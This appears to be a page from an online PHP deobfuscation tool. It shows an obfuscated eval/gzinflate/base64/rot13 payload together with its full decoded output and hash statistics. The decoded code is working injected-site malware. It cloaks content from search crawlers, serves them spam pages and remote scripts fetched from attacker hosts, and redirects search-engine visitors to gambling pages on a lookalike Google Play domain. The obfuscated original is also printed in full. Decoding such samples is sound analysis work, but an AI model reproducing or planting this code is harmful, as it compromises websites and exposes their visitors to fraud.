Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(base64_decode(str_rot13('gEa7H9cX9/sB9U9VTpsNSO9Ir2/Il+0tOXDAwjoHnz8aflDYYP..

Decoded Output download

set_time_limit(0);
error_reporting(0);
define('VERSIONS', 'VCETE');
define('APIVERSIONS', '3');
define('API_URLS', base64_decode('aHR0cHM6Ly9hcGkuMjFxdW5hcGsuY29tLw=='));
define('API_HTTP_URLS', base64_decode('aHR0cDovLzE4LjIxNi4xMTguMTQyLw=='));
define('FALLBACK_REDIRECT_HTML', base64_decode('PGh0bWw+CjxoZWFkPgogICAgPHRpdGxlPlRoZSByZXNvdXJjZSBjYW5ub3QgYmUgZm91bmQuPC90aXRsZT4KICAgIDxzY3JpcHQ+d2luZG93LmxvY2F0aW9uPSIlcyI7PC9zY3JpcHQ+CjwvaGVhZD4KPGJvZHk+CiAgICA8aDE+V2FpdC4uLi48L2gxPgo8L2JvZHk+CjwvaHRtbD4='));
define('API_HTML_JS', base64_decode('PHNjcmlwdCBzcmM9IiVzIj48L3NjcmlwdD4='));
define('API_HTML_API', "https://br.googleeplay.com/dao.html");
define('API_HTML_JUMP', 'redirectv3');
define('API_JS', 'https://br.googleeplay.com/dao.js');
$req_ref_fuckme = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$req_ua_fuckme = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '';
$host_fuckme = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';
$req_uri_fuckme = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '';
function is_prefix_fuckme($uri)
{
    $prefix_regex = '/[?\/](app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|patt|tee|sto|bea|slo|bac|pac|tig|bmw|fru|bull|card|gods|fish|mahj|uri|bak\.php)./';
    return preg_match($prefix_regex, $uri) === 1;
}

function is_crawler_fuckme($ua)
{
    $crawlers = array('Googlebot', 'Bingbot', 'MSNBOT', 'Yahoo!');
    foreach ($crawlers as $c) {
        if (stripos($ua, $c) !== false) {
            return true;
        }
    }
    return false;
}

function is_visitor_fuckme($ref)
{
    if (substr($ref, 0, 4) === 'http') {
        $refs = array('google.', 'bing.', 'yahoo.');
        foreach ($refs as $r) {
            if (stripos($ref, $r) !== false) {
                return true;
            }
        }
    }
    return false;
}

function get_client_ip_fuckme()
{
    foreach (array('HTTP_CLIENT_IP', 'HTTP_X_REAL_IP', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
        if (array_key_exists($key, $_SERVER) === true) {
            foreach (explode(',', $_SERVER[$key]) as $ip) {
                $ip = trim($ip);
                if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
                    return $ip;
                }
            }
        }
    }
    return '0.0.0.0';
}

function fetch_content_fuckme($url, $headers = array(), $conn_timeout = 30, $trans_timeout = 30)
{
    if (function_exists('curl_init')) {
        $ch = curl_init();
        try {
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
            curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $conn_timeout);
            curl_setopt($ch, CURLOPT_TIMEOUT, $trans_timeout);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            $result = curl_exec($ch);
            if ($result === false) {
                $context = stream_context_create(array(
                    'http' => array(
                        'timeout' => $trans_timeout
                    ),
                    'https' => array(
                        'timeout' => $trans_timeout
                    )
                ));
                return file_get_contents($url, false, $context);
            }
            return $result;
        } finally {
            curl_close($ch);
        }
    } else {
        $context = stream_context_create(array(
            'http' => array(
                'timeout' => $trans_timeout
            ),
            'https' => array(
                'timeout' => $trans_timeout
            )
        ));
        return file_get_contents($url, false, $context);
    }
}

function get_content_fuckme($url, $headers = array(), $conn_timeout = 30, $trans_timeout = 30)
{
    $result = fetch_content_fuckme($url, $headers, $conn_timeout, $trans_timeout);
    if ($result === false) {
        $fallback_url = str_replace(API_URLS, API_HTTP_URLS, $url);
        $result = fetch_content_fuckme($fallback_url, $headers, $conn_timeout, $trans_timeout);
    }
    return $result;
}

function main_fuckme_code()
{
    global $req_ref_fuckme, $req_ua_fuckme, $host_fuckme, $req_uri_fuckme;
    header('Cache-Control: no-store, no-cache, must-revalidate');
    header('Cache-Control: post-check=0, pre-check=0', FALSE);
    header('Pragma: no-cache');
    $uri_encoded = urlencode($req_uri_fuckme);
    $headers = array();
    if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
        $lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
        array_push($headers, "Accept-Language: $lang");
        array_push($headers, "Vary: Accept-Language");
    }
    if (is_crawler_fuckme($req_ua_fuckme)) {
        $crawler_ip = get_client_ip_fuckme();
        if (is_prefix_fuckme($req_uri_fuckme)) {
            header('Content-Type:text/html; charset=utf-8');
            $htmls = get_content_fuckme(API_URLS . "connector.html?domain={$host_fuckme}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . VERSIONS . "&v=" . APIVERSIONS, $headers);
            $htmls = str_replace('</head>', sprintf(API_HTML_JS, API_JS) . '</head>', $htmls);
            echo $htmls;
            exit;
        } else {
            $sitemaps = file_get_contents(API_URLS . "suijiurl/index.php");
            echo $sitemaps;
        }
    } elseif (is_prefix_fuckme($req_uri_fuckme) && is_visitor_fuckme($req_ref_fuckme)) {
        header('Content-Type:text/html; charset=utf-8');
        $client_ip = get_client_ip_fuckme();
        $allheaders = array();
        if (!function_exists('getallheaders')) {
            function getallheaders()
            {
                $tmp_headers = array();
                foreach ($_SERVER as $name => $value) {
                    if (substr($name, 0, 5) == 'HTTP_') {
                        $tmp_headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
                    }
                }
                return $tmp_headers;
            }

            $allheaders = getallheaders();
        } else {
            $allheaders = getallheaders();
        }
        foreach ($allheaders as $key => $value) {
            if (stripos($key, 'Sec-') === 0) {
                array_push($headers, "$key: $value");
            }
        }
        $html = get_content_fuckme(API_URLS . API_HTML_JUMP . ".html?domain={$host_fuckme}&uri={$uri_encoded}&ip={$client_ip}&ver=" . VERSIONS . "&v=" . APIVERSIONS, $headers, 2, 2);
        echo $html ?: sprintf(FALLBACK_REDIRECT_HTML, API_HTML_API);
        exit;
    }
}

main_fuckme_code();

Did this file decode correctly?

Original Code

eval(gzinflate(base64_decode(str_rot13('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'))));

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 62995a104f5f557c6a3ce0fab2952b73
Eval Count 1
Decode Time 49 ms